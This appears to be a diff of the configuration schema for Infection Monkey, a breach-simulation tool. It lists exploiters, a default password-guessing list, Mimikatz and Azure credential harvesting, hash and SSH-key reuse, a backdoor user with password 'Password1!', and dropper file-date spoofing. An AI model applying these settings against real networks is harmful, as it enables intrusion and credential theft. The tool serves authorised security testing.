"dropper_log_path_linux": {
|
||||
"title": "Dropper log file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/user-1562",
|
||||
"description": "The fullpath of the dropper log file on Linux"
|
||||
},
|
||||
"dropper_log_path_windows": {
|
||||
"title": "Dropper log file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%temp%\\~df1562.tmp",
|
||||
"description": "The fullpath of the dropper log file on Windows"
|
||||
},
|
||||
"monkey_log_path_linux": {
|
||||
"title": "Monkey log file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/user-1563",
|
||||
"description": "The fullpath of the monkey log file on Linux"
|
||||
},
|
||||
"monkey_log_path_windows": {
|
||||
"title": "Monkey log file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%temp%\\~df1563.tmp",
|
||||
"description": "The fullpath of the monkey log file on Windows"
|
||||
},
|
||||
"send_log_to_server": {
|
||||
"title": "Send log to server",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the monkey sends its log to the Monkey Island server"
|
||||
}
|
||||
}
|
||||
},
|
||||
"exploits": {
|
||||
"title": "Exploits",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploit_lm_hash_list": {
|
||||
"title": "Exploit LM hash list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [],
|
||||
"description": "List of LM hashes to use on exploits using credentials"
|
||||
},
|
||||
"exploit_ntlm_hash_list": {
|
||||
"title": "Exploit NTLM hash list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [],
|
||||
"description": "List of NTLM hashes to use on exploits using credentials"
|
||||
},
|
||||
"exploit_ssh_keys": {
|
||||
"title": "SSH key pairs list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"default": [],
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"description": "List of SSH key pairs to use, when trying to ssh into servers"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"cnc": {
|
||||
"title": "Monkey Island",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"servers": {
|
||||
"title": "Servers",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"command_servers": {
|
||||
"title": "Command servers",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"192.0.2.0:5000"
|
||||
],
|
||||
"description": "List of command servers to try and communicate with (format is <ip>:<port>)"
|
||||
},
|
||||
"internet_services": {
|
||||
"title": "Internet services",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"monkey.guardicore.com",
|
||||
"www.google.com"
|
||||
],
|
||||
"description":
|
||||
"List of internet services to try and communicate with to determine internet"
|
||||
" connectivity (use either ip or domain)"
|
||||
},
|
||||
"current_server": {
|
||||
"title": "Current server",
|
||||
"type": "string",
|
||||
"default": "192.0.2.0:5000",
|
||||
"description": "The current command server the monkey is communicating with"
|
||||
}
|
||||
}
|
||||
},
|
||||
'aws_config': {
|
||||
'title': 'AWS Configuration',
|
||||
'type': 'object',
|
||||
'description': 'These credentials will be used in order to export the monkey\'s findings to the AWS Security Hub.',
|
||||
'properties': {
|
||||
'aws_account_id': {
|
||||
'title': 'AWS account ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS account ID that is subscribed to security hub feeds',
|
||||
'default': ""
|
||||
},
|
||||
'aws_access_key_id': {
|
||||
'title': 'AWS access key ID',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS public access key ID, can be found in the IAM user interface in the AWS console.',
|
||||
'default': ""
|
||||
},
|
||||
'aws_secret_access_key': {
|
||||
'title': 'AWS secret access key',
|
||||
'type': 'string',
|
||||
'description': 'Your AWS secret access key id, you can get this after creating a public access key in the console.',
|
||||
'default': ""
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"exploits": {
|
||||
"title": "Exploits",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploiter_classes": {
|
||||
"title": "Exploits",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/exploiter_classes"
|
||||
},
|
||||
"default": [
|
||||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"SambaCryExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
"HadoopExploiter"
|
||||
],
|
||||
"description":
|
||||
"Determines which exploits to use. " + WARNING_SIGN
|
||||
+ " Note that using unsafe exploits may cause crashes of the exploited machine/service"
|
||||
},
|
||||
"skip_exploit_if_file_exist": {
|
||||
"title": "Skip exploit if file exists",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Determines whether the monkey should skip the exploit if the monkey's file"
|
||||
" is already on the remote machine"
|
||||
}
|
||||
}
|
||||
},
|
||||
"ms08_067": {
|
||||
"title": "MS08_067",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"ms08_067_exploit_attempts": {
|
||||
"title": "MS08_067 exploit attempts",
|
||||
"type": "integer",
|
||||
"default": 5,
|
||||
"description": "Number of attempts to exploit using MS08_067"
|
||||
},
|
||||
"ms08_067_remote_user_add": {
|
||||
"title": "MS08_067 remote user",
|
||||
"type": "string",
|
||||
"default": "Monkey_IUSER_SUPPORT",
|
||||
"description": "Username to add on successful exploit"
|
||||
},
|
||||
"ms08_067_remote_user_pass": {
|
||||
"title": "MS08_067 remote user password",
|
||||
"type": "string",
|
||||
"default": "Password1!",
|
||||
"description": "Password to use for created user"
|
||||
}
|
||||
}
|
||||
},
|
||||
"rdp_grinder": {
|
||||
"title": "RDP grinder",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"rdp_use_vbs_download": {
|
||||
"title": "Use VBS download",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether to use VBS or BITS to download monkey to remote machine"
|
||||
" (true=VBS, false=BITS)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"sambacry": {
|
||||
"title": "SambaCry",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"sambacry_trigger_timeout": {
|
||||
"title": "SambaCry trigger timeout",
|
||||
"type": "integer",
|
||||
"default": 5,
|
||||
"description": "Timeout (in seconds) of SambaCry trigger"
|
||||
},
|
||||
"sambacry_folder_paths_to_guess": {
|
||||
"title": "SambaCry folder paths to guess",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
'/',
|
||||
'/mnt',
|
||||
'/tmp',
|
||||
'/storage',
|
||||
'/export',
|
||||
'/share',
|
||||
'/shares',
|
||||
'/home'
|
||||
],
|
||||
"description": "List of full paths to share folder for SambaCry to guess"
|
||||
},
|
||||
"sambacry_shares_not_to_check": {
|
||||
"title": "SambaCry shares not to check",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"IPC$", "print$"
|
||||
],
|
||||
"description": "These shares won't be checked when exploiting with SambaCry"
|
||||
}
|
||||
}
|
||||
},
|
||||
"smb_service": {
|
||||
"title": "SMB service",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"smb_download_timeout": {
|
||||
"title": "SMB download timeout",
|
||||
"type": "integer",
|
||||
"default": 300,
|
||||
"description":
|
||||
"Timeout (in seconds) for SMB download operation (used in various exploits using SMB)"
|
||||
},
|
||||
"smb_service_name": {
|
||||
"title": "SMB service name",
|
||||
"type": "string",
|
||||
"default": "InfectionMonkey",
|
||||
"description": "Name of the SMB service that will be set up to download monkey"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"network": {
|
||||
"title": "Network",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"tcp_scanner": {
|
||||
"title": "TCP scanner",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"HTTP_PORTS": {
|
||||
"title": "HTTP ports",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "integer"
|
||||
},
|
||||
"default": [
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8008,
|
||||
7001
|
||||
],
|
||||
"description": "List of ports the monkey will check if are being used for HTTP"
|
||||
},
|
||||
"tcp_target_ports": {
|
||||
"title": "TCP target ports",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "integer"
|
||||
},
|
||||
"default": [
|
||||
22,
|
||||
2222,
|
||||
445,
|
||||
135,
|
||||
3389,
|
||||
80,
|
||||
8080,
|
||||
443,
|
||||
8008,
|
||||
3306,
|
||||
9200,
|
||||
7001
|
||||
],
|
||||
"description": "List of TCP ports the monkey will check whether they're open"
|
||||
},
|
||||
"tcp_scan_interval": {
|
||||
"title": "TCP scan interval",
|
||||
"type": "integer",
|
||||
"default": 200,
|
||||
"description": "Time to sleep (in milliseconds) between scans"
|
||||
},
|
||||
"tcp_scan_timeout": {
|
||||
"title": "TCP scan timeout",
|
||||
"type": "integer",
|
||||
"default": 3000,
|
||||
"description": "Maximum time (in milliseconds) to wait for TCP response"
|
||||
},
|
||||
"tcp_scan_get_banner": {
|
||||
"title": "TCP scan - get banner",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the TCP scan should try to get the banner"
|
||||
}
|
||||
}
|
||||
},
|
||||
"ping_scanner": {
|
||||
"title": "Ping scanner",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"ping_scan_timeout": {
|
||||
"title": "Ping scan timeout",
|
||||
"type": "integer",
|
||||
"default": 1000,
|
||||
"description": "Maximum time (in milliseconds) to wait for ping response"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
},
|
||||
"options": {
|
||||
"collapsed": True
|
||||
}
|
||||
}
|
||||
|
||||
# This should be used for config values of array type (array of strings only)
|
||||
ENCRYPTED_CONFIG_ARRAYS = \
|
||||
|
|
|
@ -0,0 +1,855 @@
|
|||
WARNING_SIGN = u" \u26A0"
|
||||
|
||||
|
||||
SCHEMA = {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
"definitions": {
|
||||
"exploiter_classes": {
|
||||
"title": "Exploit class",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SmbExploiter"
|
||||
],
|
||||
"title": "SMB Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"WmiExploiter"
|
||||
],
|
||||
"title": "WMI Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"RdpExploiter"
|
||||
],
|
||||
"title": "RDP Exploiter (UNSAFE)"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"Ms08_067_Exploiter"
|
||||
],
|
||||
"title": "MS08-067 Exploiter (UNSAFE)"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SSHExploiter"
|
||||
],
|
||||
"title": "SSH Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ShellShockExploiter"
|
||||
],
|
||||
"title": "ShellShock Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SambaCryExploiter"
|
||||
],
|
||||
"title": "SambaCry Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ElasticGroovyExploiter"
|
||||
],
|
||||
"title": "ElasticGroovy Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"Struts2Exploiter"
|
||||
],
|
||||
"title": "Struts2 Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"WebLogicExploiter"
|
||||
],
|
||||
"title": "Oracle Web Logic Exploiter"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"HadoopExploiter"
|
||||
],
|
||||
"title": "Hadoop/Yarn Exploiter"
|
||||
}
|
||||
]
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint class",
|
||||
"type": "string",
|
||||
"anyOf": [
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SMBFinger"
|
||||
],
|
||||
"title": "SMBFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"SSHFinger"
|
||||
],
|
||||
"title": "SSHFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"PingScanner"
|
||||
],
|
||||
"title": "PingScanner"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"HTTPFinger"
|
||||
],
|
||||
"title": "HTTPFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MySQLFinger"
|
||||
],
|
||||
"title": "MySQLFinger"
|
||||
},
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"MSSQLFinger"
|
||||
],
|
||||
"title": "MSSQLFinger"
|
||||
},
|
||||
|
||||
{
|
||||
"type": "string",
|
||||
"enum": [
|
||||
"ElasticFinger"
|
||||
],
|
||||
"title": "ElasticFinger"
|
||||
}
|
||||
]
|
||||
}
|
||||
},
|
||||
"properties": {
|
||||
"basic": {
|
||||
"title": "Basic - Credentials",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"credentials": {
|
||||
"title": "Credentials",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploit_user_list": {
|
||||
"title": "Exploit user list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"Administrator",
|
||||
"root",
|
||||
"user"
|
||||
],
|
||||
"description": "List of usernames to use on exploits using credentials"
|
||||
},
|
||||
"exploit_password_list": {
|
||||
"title": "Exploit password list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"Password1!",
|
||||
"1234",
|
||||
"password",
|
||||
"12345678"
|
||||
],
|
||||
"description": "List of password to use on exploits using credentials"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"basic_network": {
|
||||
"title": "Basic - Network",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"blocked_ips": {
|
||||
"title": "Blocked IPs",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description": "List of IPs to not scan"
|
||||
},
|
||||
"local_network_scan": {
|
||||
"title": "Local network scan",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the monkey should scan its subnets additionally"
|
||||
},
|
||||
"depth": {
|
||||
"title": "Distance from island",
|
||||
"type": "integer",
|
||||
"default": 2,
|
||||
"description":
|
||||
"Amount of hops allowed for the monkey to spread from the island. "
|
||||
+ WARNING_SIGN
|
||||
+ " Note that setting this value too high may result in the monkey propagating too far"
|
||||
},
|
||||
"subnet_scan_list": {
|
||||
"title": "Scan IP/subnet list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description":
|
||||
"List of IPs/subnets the monkey should scan."
|
||||
" Examples: \"192.168.0.1\", \"192.168.0.5-192.168.0.20\", \"192.168.0.5/24\""
|
||||
}
|
||||
}
|
||||
},
|
||||
"network_analysis": {
|
||||
"title": "Network Analysis",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"inaccessible_subnets": {
|
||||
"title": "Network segmentation testing",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
],
|
||||
"description":
|
||||
"Test for network segmentation by providing a list of"
|
||||
" subnets that should NOT be accessible to each other."
|
||||
" For example, given the following configuration:"
|
||||
" '10.0.0.0/24, 11.0.0.2/32, 12.2.3.0/24'"
|
||||
" a Monkey running on 10.0.0.5 will try to access machines in the following"
|
||||
" subnets: 11.0.0.2/32, 12.2.3.0/24."
|
||||
" An alert on successful connections will be shown in the report"
|
||||
" Additional subnet formats include: 13.0.0.1, 13.0.0.1-13.0.0.5"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"monkey": {
|
||||
"title": "Monkey",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"alive": {
|
||||
"title": "Alive",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Is the monkey alive"
|
||||
}
|
||||
}
|
||||
},
|
||||
"behaviour": {
|
||||
"title": "Behaviour",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"self_delete_in_cleanup": {
|
||||
"title": "Self delete on cleanup",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Should the monkey delete its executable when going down"
|
||||
},
|
||||
"use_file_logging": {
|
||||
"title": "Use file logging",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Should the monkey dump to a log file"
|
||||
},
|
||||
"serialize_config": {
|
||||
"title": "Serialize config",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Should the monkey dump its config on startup"
|
||||
}
|
||||
}
|
||||
},
|
||||
"system_info": {
|
||||
"title": "System info",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"extract_azure_creds": {
|
||||
"title": "Harvest Azure Credentials",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determine if the Monkey should try to harvest password credentials from Azure VMs"
|
||||
},
|
||||
"collect_system_info": {
|
||||
"title": "Collect system info",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether to collect system info"
|
||||
},
|
||||
"should_use_mimikatz": {
|
||||
"title": "Should use Mimikatz",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether to use Mimikatz"
|
||||
},
|
||||
}
|
||||
},
|
||||
"life_cycle": {
|
||||
"title": "Life cycle",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"max_iterations": {
|
||||
"title": "Max iterations",
|
||||
"type": "integer",
|
||||
"default": 1,
|
||||
"description": "Determines how many iterations of the monkey's full lifecycle should occur"
|
||||
},
|
||||
"victims_max_find": {
|
||||
"title": "Max victims to find",
|
||||
"type": "integer",
|
||||
"default": 30,
|
||||
"description": "Determines the maximum number of machines the monkey is allowed to scan"
|
||||
},
|
||||
"victims_max_exploit": {
|
||||
"title": "Max victims to exploit",
|
||||
"type": "integer",
|
||||
"default": 7,
|
||||
"description":
|
||||
"Determines the maximum number of machines the monkey"
|
||||
" is allowed to successfully exploit. " + WARNING_SIGN
|
||||
+ " Note that setting this value too high may result in the monkey propagating to "
|
||||
"a high number of machines"
|
||||
},
|
||||
"timeout_between_iterations": {
|
||||
"title": "Wait time between iterations",
|
||||
"type": "integer",
|
||||
"default": 100,
|
||||
"description":
|
||||
"Determines for how long (in seconds) should the monkey wait between iterations"
|
||||
},
|
||||
"retry_failed_explotation": {
|
||||
"title": "Retry failed exploitation",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the monkey should retry exploiting machines"
|
||||
" it didn't successfuly exploit on previous iterations"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"internal": {
|
||||
"title": "Internal",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"singleton_mutex_name": {
|
||||
"title": "Singleton mutex name",
|
||||
"type": "string",
|
||||
"default": "{2384ec59-0df8-4ab9-918c-843740924a28}",
|
||||
"description":
|
||||
"The name of the mutex used to determine whether the monkey is already running"
|
||||
},
|
||||
"keep_tunnel_open_time": {
|
||||
"title": "Keep tunnel open time",
|
||||
"type": "integer",
|
||||
"default": 60,
|
||||
"description": "Time to keep tunnel open before going down after last exploit (in seconds)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"classes": {
|
||||
"title": "Classes",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"scanner_class": {
|
||||
"title": "Scanner class",
|
||||
"type": "string",
|
||||
"default": "TcpScanner",
|
||||
"enum": [
|
||||
"TcpScanner"
|
||||
],
|
||||
"enumNames": [
|
||||
"TcpScanner"
|
||||
],
|
||||
"description": "Determines class to scan for machines. (Shouldn't be changed)"
|
||||
},
|
||||
"finger_classes": {
|
||||
"title": "Fingerprint classes",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/finger_classes"
|
||||
},
|
||||
"default": [
|
||||
"SMBFinger",
|
||||
"SSHFinger",
|
||||
"PingScanner",
|
||||
"HTTPFinger",
|
||||
"MySQLFinger",
|
||||
"MSSQLFinger",
|
||||
"ElasticFinger"
|
||||
],
|
||||
"description": "Determines which classes to use for fingerprinting"
|
||||
}
|
||||
}
|
||||
},
|
||||
"kill_file": {
|
||||
"title": "Kill file",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"kill_file_path_windows": {
|
||||
"title": "Kill file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%windir%\\monkey.not",
|
||||
"description": "Path of file which kills monkey if it exists (on Windows)"
|
||||
},
|
||||
"kill_file_path_linux": {
|
||||
"title": "Kill file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/var/run/monkey.not",
|
||||
"description": "Path of file which kills monkey if it exists (on Linux)"
|
||||
}
|
||||
}
|
||||
},
|
||||
"dropper": {
|
||||
"title": "Dropper",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"dropper_set_date": {
|
||||
"title": "Dropper sets date",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the dropper should set the monkey's file date to be the same as"
|
||||
" another file"
|
||||
},
|
||||
"dropper_date_reference_path_windows": {
|
||||
"title": "Dropper date reference path (Windows)",
|
||||
"type": "string",
|
||||
"default": "%windir%\\system32\\kernel32.dll",
|
||||
"description":
|
||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||
" so on Windows (use fullpath)"
|
||||
},
|
||||
"dropper_date_reference_path_linux": {
|
||||
"title": "Dropper date reference path (Linux)",
|
||||
"type": "string",
|
||||
"default": "/bin/sh",
|
||||
"description":
|
||||
"Determines which file the dropper should copy the date from if it's configured to do"
|
||||
" so on Linux (use fullpath)"
|
||||
},
|
||||
"dropper_target_path_linux": {
|
||||
"title": "Dropper target path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/monkey",
|
||||
"description": "Determines where should the dropper place the monkey on a Linux machine"
|
||||
},
|
||||
"dropper_target_path_win_32": {
|
||||
"title": "Dropper target path on Windows (32bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey32.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||
"(32bit)"
|
||||
},
|
||||
"dropper_target_path_win_64": {
|
||||
"title": "Dropper target path on Windows (64bit)",
|
||||
"type": "string",
|
||||
"default": "C:\\Windows\\monkey64.exe",
|
||||
"description": "Determines where should the dropper place the monkey on a Windows machine "
|
||||
"(64 bit)"
|
||||
},
|
||||
"dropper_try_move_first": {
|
||||
"title": "Try to move first",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description":
|
||||
"Determines whether the dropper should try to move itsel instead of copying itself"
|
||||
" to target path"
|
||||
}
|
||||
}
|
||||
},
|
||||
"logging": {
|
||||
"title": "Logging",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"dropper_log_path_linux": {
|
||||
"title": "Dropper log file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/user-1562",
|
||||
"description": "The fullpath of the dropper log file on Linux"
|
||||
},
|
||||
"dropper_log_path_windows": {
|
||||
"title": "Dropper log file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%temp%\\~df1562.tmp",
|
||||
"description": "The fullpath of the dropper log file on Windows"
|
||||
},
|
||||
"monkey_log_path_linux": {
|
||||
"title": "Monkey log file path on Linux",
|
||||
"type": "string",
|
||||
"default": "/tmp/user-1563",
|
||||
"description": "The fullpath of the monkey log file on Linux"
|
||||
},
|
||||
"monkey_log_path_windows": {
|
||||
"title": "Monkey log file path on Windows",
|
||||
"type": "string",
|
||||
"default": "%temp%\\~df1563.tmp",
|
||||
"description": "The fullpath of the monkey log file on Windows"
|
||||
},
|
||||
"send_log_to_server": {
|
||||
"title": "Send log to server",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
"description": "Determines whether the monkey sends its log to the Monkey Island server"
|
||||
}
|
||||
}
|
||||
},
|
||||
"exploits": {
|
||||
"title": "Exploits",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploit_lm_hash_list": {
|
||||
"title": "Exploit LM hash list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [],
|
||||
"description": "List of LM hashes to use on exploits using credentials"
|
||||
},
|
||||
"exploit_ntlm_hash_list": {
|
||||
"title": "Exploit NTLM hash list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [],
|
||||
"description": "List of NTLM hashes to use on exploits using credentials"
|
||||
},
|
||||
"exploit_ssh_keys": {
|
||||
"title": "SSH key pairs list",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"default": [],
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"description": "List of SSH key pairs to use, when trying to ssh into servers"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"cnc": {
|
||||
"title": "Monkey Island",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"servers": {
|
||||
"title": "Servers",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"command_servers": {
|
||||
"title": "Command servers",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"192.0.2.0:5000"
|
||||
],
|
||||
"description": "List of command servers to try and communicate with (format is <ip>:<port>)"
|
||||
},
|
||||
"internet_services": {
|
||||
"title": "Internet services",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"type": "string"
|
||||
},
|
||||
"default": [
|
||||
"monkey.guardicore.com",
|
||||
"www.google.com"
|
||||
],
|
||||
"description":
|
||||
"List of internet services to try and communicate with to determine internet"
|
||||
" connectivity (use either ip or domain)"
|
||||
},
|
||||
"current_server": {
|
||||
"title": "Current server",
|
||||
"type": "string",
|
||||
"default": "192.0.2.0:5000",
|
||||
"description": "The current command server the monkey is communicating with"
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
},
|
||||
"exploits": {
|
||||
"title": "Exploits",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"general": {
|
||||
"title": "General",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"exploiter_classes": {
|
||||
"title": "Exploits",
|
||||
"type": "array",
|
||||
"uniqueItems": True,
|
||||
"items": {
|
||||
"$ref": "#/definitions/exploiter_classes"
|
||||
},
|
||||
"default": [
|
||||
"SmbExploiter",
|
||||
"WmiExploiter",
|
||||
"SSHExploiter",
|
||||
"ShellShockExploiter",
|
||||
"SambaCryExploiter",
|
||||
"ElasticGroovyExploiter",
|
||||
"Struts2Exploiter",
|
||||
"WebLogicExploiter",
|
||||
"HadoopExploiter"
|
||||
],
|
||||
"description":
|
||||
"Determines which exploits to use. " + WARNING_SIGN
|
||||
+ " Note that using unsafe exploits may cause crashes of the exploited machine/service"
|
||||
},
|
||||
"skip_exploit_if_file_exist": {
|
||||
"title": "Skip exploit if file exists",
|
||||
"type": "boolean",
|
||||
"default": False,
|
||||
"description": "Determines whether the monkey should skip the exploit if the monkey's file"
|
||||
" is already on the remote machine"
|
||||
}
|
||||
}
|
||||
},
|
||||
"ms08_067": {
|
||||
"title": "MS08_067",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"ms08_067_exploit_attempts": {
|
||||
"title": "MS08_067 exploit attempts",
|
||||
"type": "integer",
|
||||
"default": 5,
|
||||
"description": "Number of attempts to exploit using MS08_067"
|
||||
},
|
||||
"ms08_067_remote_user_add": {
|
||||
"title": "MS08_067 remote user",
|
||||
"type": "string",
|
||||
"default": "Monkey_IUSER_SUPPORT",
|
||||
"description": "Username to add on successful exploit"
|
||||
},
|
||||
"ms08_067_remote_user_pass": {
|
||||
"title": "MS08_067 remote user password",
|
||||
"type": "string",
|
||||
"default": "Password1!",
|
||||
"description": "Password to use for created user"
|
||||
}
|
||||
}
|
||||
},
|
||||
"rdp_grinder": {
|
||||
"title": "RDP grinder",
|
||||
"type": "object",
|
||||
"properties": {
|
||||
"rdp_use_vbs_download": {
|
||||
"title": "Use VBS download",
|
||||
"type": "boolean",
|
||||
"default": True,
|
||||
